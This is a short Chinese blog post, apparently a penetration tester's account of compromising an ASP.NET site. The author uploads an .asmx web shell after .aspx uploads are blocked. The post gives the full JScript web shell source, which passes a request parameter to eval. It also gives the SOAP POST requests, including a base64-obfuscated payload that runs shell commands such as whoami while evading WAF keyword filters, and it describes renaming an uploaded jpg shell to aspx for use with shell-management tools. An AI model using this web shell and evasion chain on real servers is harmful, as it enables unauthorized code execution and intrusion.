测试
在上传webshell的时候遇见asp.net的站,传aspx被拦截,测试发现能够解析asmx,搜了下发现这篇文章https://www.cnblogs.com/Ivan1ee/p/10278625.html
执行命令
直接拉到重点看到服务端实现的代码。
<%@ WebService Language="JScript" class="asmxWebMethodSpy"%>
import System;
import System.Web;
import System.IO;
import System.Web.Services;
public class asmxWebMethodSpy extends WebService
{
WebMethodAttribute function Invoke(Ivan: String) : Void
{
var I = HttpContext.Current;
var Request = I.Request;
var Response = I.Response;
var Server = I.Server;
Response.Write("<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>");
eval(Ivan);
}
}
直接上传后访问如下
image.png
按照文章中的操作post数据包,页面返回时间,说明执行命令成功。但是执行敏感操作是被waf拦截,应该是存在关键字。
POST /UploadFiles/Content/file/xxx HTTP/1.1
Host: xxx.xxx.xxx
Content-Type: text/xml; charset=utf-8
Content-Length: 1771
SOAPAction: "http://tempuri.org/Invoke"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<Invoke xmlns="http://tempuri.org/">
<Ivan>Response.Write(DateTime.Now);</Ivan>
</Invoke>
</soap:Body>
</soap:Envelope>
参考其他流量加密的shell管理工具的数据包,修改执行命令的数据包如下。
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<Invoke xmlns="http://tempuri.org/">
<Ivan>Response.Write("e600c");var err:Exception;try{eval(System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String("dmFyIGNtZD0iZDJodllXMXAiO3ZhciBjPW5ldyBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbyhTeXN0ZW0uVGV4dC5FbmNvZGluZy5HZXRFbmNvZGluZygiVVRGLTgiKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZygiWTIxayIpKSk7dmFyIGU9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzKCk7dmFyIG91dDpTeXN0ZW0uSU8uU3RyZWFtUmVhZGVyLEVJOlN5c3RlbS5JTy5TdHJlYW1SZWFkZXI7Yy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2U7Yy5SZWRpcmVjdFN0YW5kYXJkT3V0cHV0PXRydWU7Yy5SZWRpcmVjdFN0YW5kYXJkRXJyb3I9dHJ1ZTtlLlN0YXJ0SW5mbz1jO2MuQXJndW1lbnRzPSIvYyAiK1N5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKCJVVEYtOCIpLkdldFN0cmluZyhTeXN0ZW0uQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKGNtZCkpO2lmKGZhbHNlKSB7dmFyIGVudnN0ciA9IFN5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKCJVVEYtOCIpLkdldFN0cmluZyhTeXN0ZW0uQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKFJlcXVlc3QuSXRlbVsiZWJmNDIyNjY3NTZlNDgiXSkpO3ZhciBlbnZhcnIgPSBlbnZzdHIuc3BsaXQoInx8fGFzbGluZXx8fCIpO3ZhciBpO2ZvciAodmFyIGkgaW4gZW52YXJyKSB7dmFyIHNzID0gZW52YXJyW2ldLnNwbGl0KCJ8fHxhc2tleXx8fCIpO2lmIChzcy5sZW5ndGggIT0gMikge2NvbnRpbnVlO31jLkVudmlyb25tZW50VmFyaWFibGVzLkFkZChzc1swXSxzc1sxXSk7fX1lLlN0YXJ0KCk7b3V0PWUuU3RhbmRhcmRPdXRwdXQ7RUk9ZS5TdGFuZGFyZEVycm9yO2UuQ2xvc2UoKTtSZXNwb25zZS5Xcml0ZShvdXQuUmVhZFRvRW5kKCkgKyBFSS5SZWFkVG9FbmQoKSk7")),"unsafe");}catch(err){Response.Write("ERROR:// "+err.message);}Response.Write("89f96f3");Response.End()</Ivan>
</Invoke>
</soap:Body>
</soap:Envelope>
上面数据包执行的命令是whoami,后面就简单了,上传一个jpg的shell,使用mv命令改为后缀aspx,上那个冰蝎连接。(出来了一个好像更牛逼的叫哥斯拉在github上搜Godzilla)
image.png
网友评论